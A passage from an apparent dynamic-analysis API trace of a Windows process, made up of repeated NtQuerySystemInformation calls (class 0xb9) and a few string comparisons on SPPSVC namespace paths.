(SystemInformationClass=0xb9, SystemInformation=0xc751f7db50, Length=0x20, ResultLength=0x0) [0238.256] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dae0, Length=0x20, ResultLength=0x0) [0238.256] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.256] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.256] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.256] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dae0, Length=0x20, ResultLength=0x0) [0238.257] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.257] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.257] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.257] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.257] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.257] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.262] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ded0, Length=0x40, ResultLength=0x0) [0238.262] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.262] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.262] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7de30, Length=0x40, ResultLength=0x0) [0238.263] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.263] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7de30, Length=0x40, ResultLength=0x0) [0238.263] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dd50, Length=0x30, ResultLength=0x0) [0238.263] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.263] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dd50, Length=0x30, ResultLength=0x0) [0238.263] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dc58, Length=0x30, ResultLength=0x0) [0238.263] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dbc0, Length=0x38, ResultLength=0x0) [0238.263] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.263] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.263] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.264] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7da30, Length=0x50, ResultLength=0x0) [0238.264] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d9b0, Length=0x28, ResultLength=0x0) [0238.264] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0238.264] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.264] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.264] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7da30, Length=0x50, ResultLength=0x0) [0238.264] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.264] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7da30, Length=0x50, ResultLength=0x0) [0238.264] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.264] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7da30, Length=0x50, ResultLength=0x0) [0238.264] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.264] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d960, Length=0x38, ResultLength=0x0) [0238.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d790, Length=0x28, ResultLength=0x0) [0238.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d790, Length=0x28, ResultLength=0x0) [0238.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d790, Length=0x28, ResultLength=0x0) [0238.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.269] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d800, Length=0x28, ResultLength=0x0) [0238.269] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.269] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.269] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d960, Length=0x38, ResultLength=0x0) [0238.269] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.269] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d880, Length=0x28, ResultLength=0x0) [0238.272] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.272] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.272] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.272] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.272] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.272] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.272] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d880, Length=0x28, ResultLength=0x0) [0238.273] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d720, Length=0x20, ResultLength=0x0) [0238.273] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d6a0, Length=0x20, ResultLength=0x0) [0238.273] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.273] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d6a0, Length=0x20, ResultLength=0x0) [0238.273] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.273] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d6a0, Length=0x20, ResultLength=0x0) [0238.273] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.273] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.273] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.273] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.273] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.273] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d960, Length=0x38, ResultLength=0x0) [0238.273] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.273] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d960, Length=0x38, ResultLength=0x0) [0238.273] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d7e0, Length=0x20, ResultLength=0x0) [0238.273] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d770, Length=0x20, ResultLength=0x0) [0238.274] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.274] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.274] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.274] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d770, Length=0x20, ResultLength=0x0) [0238.274] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.274] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.274] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.274] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.274] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.274] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.274] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.274] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7de30, Length=0x40, ResultLength=0x0) [0238.277] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.277] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7de30, Length=0x40, ResultLength=0x0) [0238.277] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.277] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7de30, Length=0x40, ResultLength=0x0) [0238.277] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dd50, Length=0x30, ResultLength=0x0) [0238.277] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.277] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dd50, Length=0x30, ResultLength=0x0) [0238.277] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dc58, Length=0x30, ResultLength=0x0) [0238.277] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dbc0, Length=0x38, ResultLength=0x0) [0238.277] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.277] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.277] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.278] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7da30, Length=0x50, ResultLength=0x0) [0238.278] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d9b0, Length=0x28, ResultLength=0x0) [0238.278] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0238.278] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.278] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.278] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7da30, Length=0x50, ResultLength=0x0) [0238.278] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.278] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7da30, Length=0x50, ResultLength=0x0) [0238.278] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.278] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7da30, Length=0x50, ResultLength=0x0) [0238.279] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.279] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d960, Length=0x38, ResultLength=0x0) [0238.281] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.281] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d790, Length=0x28, ResultLength=0x0) [0238.281] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.281] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.281] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d790, Length=0x28, ResultLength=0x0) [0238.281] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.281] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.281] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d790, Length=0x28, ResultLength=0x0) [0238.281] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.281] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.281] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d800, Length=0x28, ResultLength=0x0) [0238.282] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.282] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.282] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d960, Length=0x38, ResultLength=0x0) [0238.282] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.282] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d880, Length=0x28, ResultLength=0x0) [0238.286] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.286] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.286] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.286] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.286] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.287] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.287] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d880, Length=0x28, ResultLength=0x0) [0238.287] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.287] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.287] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d960, Length=0x38, ResultLength=0x0) [0238.287] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d7e0, Length=0x20, ResultLength=0x0) [0238.287] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d760, Length=0x20, ResultLength=0x0) [0238.287] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.287] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d760, Length=0x20, ResultLength=0x0) [0238.287] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.287] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d760, Length=0x20, ResultLength=0x0) [0238.287] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.287] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.287] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.287] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.288] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d960, Length=0x38, ResultLength=0x0) [0238.288] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d7e0, Length=0x20, ResultLength=0x0) [0238.288] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d770, Length=0x20, ResultLength=0x0) [0238.288] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.288] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.288] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.288] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d770, Length=0x20, ResultLength=0x0) [0238.288] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.288] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.288] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.288] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.288] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.288] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.288] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7da30, Length=0x50, ResultLength=0x0) [0238.288] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d9b0, Length=0x28, ResultLength=0x0) [0238.288] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0238.289] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.289] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.289] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7da30, Length=0x50, ResultLength=0x0) [0238.289] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.289] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7da30, Length=0x50, ResultLength=0x0) [0238.289] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.289] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7da30, Length=0x50, ResultLength=0x0) [0238.289] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.289] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d960, Length=0x38, ResultLength=0x0) [0238.291] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.291] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d790, Length=0x28, ResultLength=0x0) [0238.291] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d790, Length=0x28, ResultLength=0x0) [0238.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d790, Length=0x28, ResultLength=0x0) [0238.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d800, Length=0x28, ResultLength=0x0) [0238.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d960, Length=0x38, ResultLength=0x0) [0238.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d880, Length=0x28, ResultLength=0x0) [0238.295] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.295] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.295] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d880, Length=0x28, ResultLength=0x0) [0238.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d960, Length=0x38, ResultLength=0x0) [0238.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d7e0, Length=0x20, ResultLength=0x0) [0238.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d760, Length=0x20, ResultLength=0x0) [0238.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d760, Length=0x20, ResultLength=0x0) [0238.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d760, Length=0x20, ResultLength=0x0) [0238.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d960, Length=0x38, ResultLength=0x0) [0238.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d7e0, Length=0x20, ResultLength=0x0) [0238.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d770, Length=0x20, ResultLength=0x0) [0238.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d770, Length=0x20, ResultLength=0x0) [0238.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.298] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.298] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.298] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.298] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.298] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.298] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.298] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e130, Length=0x50, ResultLength=0x0) [0238.298] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e0b0, Length=0x28, ResultLength=0x0) [0238.298] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0238.298] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.298] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e130, Length=0x50, ResultLength=0x0) [0238.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e130, Length=0x50, ResultLength=0x0) [0238.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e130, Length=0x50, ResultLength=0x0) [0238.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e060, Length=0x38, ResultLength=0x0) [0238.303] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.303] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7de90, Length=0x28, 